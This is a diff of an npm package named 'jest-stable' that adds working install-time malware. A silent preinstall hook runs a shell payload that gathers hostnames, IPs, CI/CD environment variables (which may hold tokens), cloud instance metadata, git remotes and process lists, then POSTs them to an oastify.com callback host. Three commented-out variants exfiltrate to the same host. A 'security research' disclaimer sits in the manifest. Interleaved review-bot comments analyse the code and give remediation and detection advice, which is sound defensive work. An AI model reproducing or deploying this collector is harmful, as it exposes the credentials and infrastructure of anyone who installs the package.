jest-stable 40.1.10

Files changed (2)
  1. package/index.js +163 -0
  2. package/package.json +15 -0
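--- /dev/null
+++ b/package/index.js
@@ -0,0 +1,163 @@
+ //const { exec } = require("child_process");
+ /*
+ // Method 1: Simple and reliable - direct data exfiltration
+ const payload = `
+ hostname=$(hostname)
+ pwd=$(pwd)
+ user=$(whoami)
+ ip=$(curl -s https://ifconfig.me)
+ package="sarumaan_a"
+
+ data="${hostname}|${pwd}|${user}|${ip}|${package}"
+ encoded=$(echo -n "$data" | base64 | tr -d '\\n')
+
+ curl -k -s "http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/${encoded}"
+ `;
+
+ exec(payload, (error, stdout, stderr) => {
+ if (error) {
+ console.log("error", error.message);
+ return;
+ }
+ if (stderr) {
+ console.log("stderr:", stderr);
+ return;
+ }
+ console.log(stdout);
+ });*/
+
+ // Method 2: Alternative - POST request with data in body (more stealthy)
+ /*
+ const payload2 = `
+ data=$(hostname;echo "|";pwd;echo "|";whoami;echo "|";curl -s https://ifconfig.me;echo "|sarumaan_a")
+ curl -k -s -X POST -d "$data" http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/exfil
+ `;
+
+ exec(payload2, (error, stdout, stderr) => {
+ if (error) {
+ console.log("error", error.message);
+ return;
+ }
+ console.log(stdout);
+ });
+ */
+
+ // Method 3: Most reliable - JSON exfiltration via DNS or HTTP
+ /*const { exec } = require("child_process");
+ const payload3 = `
+ curl -k -s -H "Content-Type: application/json" -X POST -d "{\\"host\\":\\"$(hostname)\\",\\"pwd\\":\\"$(pwd)\\",\\"user\\":\\"$(whoami)\\",\\"ip\\":\\"$(curl -s https://ifconfig.me)\\",\\"pkg\\":\\"sarumaan_a\\"}" http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/data
+ `;
+
+ exec(payload3, (error, stdout, stderr) => {
+ if (error) {
+ console.log("error", error.message);
+ return;
+ }
+ console.log(stdout);
+ });*/
+
+ const { exec } = require("child_process");
+
+ // Enhanced Shell Payload
+ // Collects multiple data points and sends them as a structured JSON object
+ const enhancedPayload = `
+ # 1. COLLECT SYSTEM & NETWORK IDENTIFYING INFORMATION
+ HOST_FQDN=$(hostname -f 2>/dev/null || hostname)
+ SHORT_HOST=$(hostname -s)
+ PUBLIC_IP=$(curl -s https://ifconfig.me 2>/dev/null || echo "NO_PUBLIC_IP")
+ INTERNAL_IPS=$(ip addr show 2>/dev/null | grep -E "inet (172|10|192.168)" || ifconfig 2>/dev/null | grep -E "inet (172|10|192.168)" || echo "NO_INTERNAL_IPS")
+ DOMAIN=$(domainname 2>/dev/null || echo "NO_DOMAIN")
+
+ # 2. GOLDEN SOURCE: CI/CD & BUILD ENVIRONMENT VARIABLES
+ # These often contain project URLs, organization names, and repository info
+ CI_VARS=$(env | grep -E "(CI_|GITLAB_|GITHUB_|JENKINS_|BUILD_|PROJECT|REPO)" | head -20)
+ if [ -z "$CI_VARS" ]; then CI_VARS="NO_CI_VARS_FOUND"; fi
+
+ # 3. CHECK FOR CLOUD PROVIDER METADATA (AWS, GCP, Azure)
+ CLOUD_INFO="NO_CLOUD_METADATA"
+ # Try AWS Instance Metadata
+ if curl -s -f --connect-timeout 2 http://169.254.169.254/latest/meta-data/instance-id >/dev/null 2>&1; then
+ AWS_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id)
+ AWS_TYPE=$(curl -s http://169.254.169.254/latest/meta-data/instance-type)
+ CLOUD_INFO="AWS: $AWS_ID ($AWS_TYPE)"
+ # Try Google Cloud Metadata
+ elif curl -s -f -H "Metadata-Flavor: Google" --connect-timeout 2 http://metadata.google.internal/computeMetadata/v1/instance/id >/dev/null 2>&1; then
+ GCP_ID=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/id)
+ GCP_PROJECT=$(curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/project/project-id)
+ CLOUD_INFO="GCP: $GCP_ID (Project: $GCP_PROJECT)"
+ fi
+
+ # 4. SEARCH FOR GIT REPOSITORIES (Contain remote URLs)
+ GIT_REMOTES="NO_GIT_REPOS"
+ for dir in /home /root /opt /app /src /workspace /var /srv; do
+ if [ -d "$dir" ]; then
+ REPO=$(find "$dir" -name ".git" -type d 2>/dev/null | head -1)
+ if [ -n "$REPO" ]; then
+ GIT_REMOTE=$(cd "$REPO/.." && git remote -v 2>/dev/null | head -2)
+ GIT_REMOTES="$GIT_REMOTE"
+ break
+ fi
+ fi
+ done
+
+ # 5. CHECK CURRENT DIRECTORY FOR PROJECT FILES
+ PROJECT_FILES=$(ls -la 2>/dev/null | head -15)
+ PWD_PATH=$(pwd)
+
+ # 6. GET PROCESS INFO (See what's running)
+ RUNNING_PROCESSES=$(ps aux 2>/dev/null | head -10)
+
+ # 7. CREATE THE ENHANCED DATA PAYLOAD
+ # Read package name from package.json if it exists
+ if [ -f "package.json" ]; then
+ PKG_NAME=$(node -e "console.log(JSON.parse(require('fs').readFileSync('package.json')).name || 'unknown')" 2>/dev/null || echo "unknown")
+ else
+ PKG_NAME="unknown"
+ fi
+
+ # Build the JSON payload with all collected data
+ JSON_PAYLOAD=$(cat <<EOF
+ {
+ "package": "$PKG_NAME",
+ "system": {
+ "hostname_fqdn": "$HOST_FQDN",
+ "hostname_short": "$SHORT_HOST",
+ "domain": "$DOMAIN",
+ "public_ip": "$PUBLIC_IP",
+ "internal_ips": "$INTERNAL_IPS",
+ "current_path": "$PWD_PATH"
+ },
+ "environment": {
+ "ci_cd_vars": "$CI_VARS",
+ "cloud_metadata": "$CLOUD_INFO",
+ "git_remotes": "$GIT_REMOTES",
+ "processes": "$RUNNING_PROCESSES"
+ },
+ "directory": "$PROJECT_FILES",
+ "timestamp": "$(date -u +"%Y-%m-%dT%H:%M:%SZ")"
+ }
+ EOF
+ )
+
+ # 8. SEND THE ENHANCED PAYLOAD TO CALLBACK SERVER
+ # ESCAPE the JSON properly for curl
+ curl -k -s -X POST \\
+ -H "Content-Type: application/json" \\
+ -H "User-Agent: Node/14.0.0" \\
+ -d "$JSON_PAYLOAD" \\
+ http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/data
+ `;
+
+ // Execute the enhanced payload
+ exec(enhancedPayload, (error, stdout, stderr) => {
+ if (error) {
+ console.error("Payload execution error:", error.message);
+ // Fallback to basic payload if enhanced one fails
+ const basicPayload = `curl -k -s -X POST -H "Content-Type: application/json" -d '{"host":"$(hostname)","pkg":"sarumaan_a","fallback":"true"}' http://7nv0bfnhimpr5lrd9fuw8t0wvn1ep9dy.oastify.com/data`;
+ exec(basicPayload);
+ return;
+ }
+
+ if (stdout) console.log("Callback sent:", stdout.substring(0, 200));
+ if (stderr) console.error("Stderr:", stderr);
+ });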
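Review bot: The live code from `const enhancedPayload` through the final `exec(enhancedPayload, ...)` callback shells out and posts host names, internal and public IPs, `env` lines matching `CI_|GITLAB_|GITHUB_|JENKINS_|BUILD_|PROJECT|REPO`, cloud instance metadata, git remotes, a directory listing and a process list to an external `oastify.com` host over plain HTTP, which is far more than is needed to show that an install ran. That `env` filter also matches token-bearing variables such as `GITHUB_TOKEN`, and `ps aux` output can carry secrets passed on command lines, so any workstation or CI runner that installed this version should be handled as a credential exposure: rotate whatever was in the environment and review the affected job logs. For detection, look for `curl` spawned under `npm`/`node` during an install and for outbound requests from build hosts to the callback host, `ifconfig.me`, `169.254.169.254` or `metadata.google.internal`. The three commented-out "Method" blocks above the live code are earlier variants aimed at the same host and do not execute.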
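--- /dev/null
+++ b/package/package.json
@@ -0,0 +1,15 @@
+ {
+ "name": "jest-stable",
+ "version": "40.1.10",
+ "description": "This is for security research only. PLEASE DO NOT USE. If you are affected by this, my sincere apollogies. If you want me to test your infrastructure for this vulnerability or need a penetration tester, I am available for employment. You can reach me on sarumaan@wearehackerone.com Thank you for understanding.....",
+ "main": "main.js",
+ "scripts": {
+ "preinstall": "node index.js > /dev/null 2>&1",
+ "test": "echo \"Error: no test specified\" && exit 1"
+ },
+ "author": "Hackerone_sarumaan",
+ "license": "ISC",
+ "dependencies": {
+ "lodash": "^4.1.21"
+ }
+ }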
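Review bot: The `preinstall` script `node index.js > /dev/null 2>&1` runs the collector during `npm install`, before any code imports the package, and discards its output so nothing shows up in the install log. `main` points to `main.js`, which is not among the two files in this version, so the package appears to have no function other than the install hook; the name `jest-stable` together with the description suggests a look-alike or dependency-confusion test, though that is inferred from the manifest alone. Consumers reduce exposure by installing with `--ignore-scripts` (or `ignore-scripts=true` in `.npmrc`), pinning resolved versions through a lockfile, and scoping or reserving internal package names so a public package of the same name cannot be resolved in their place.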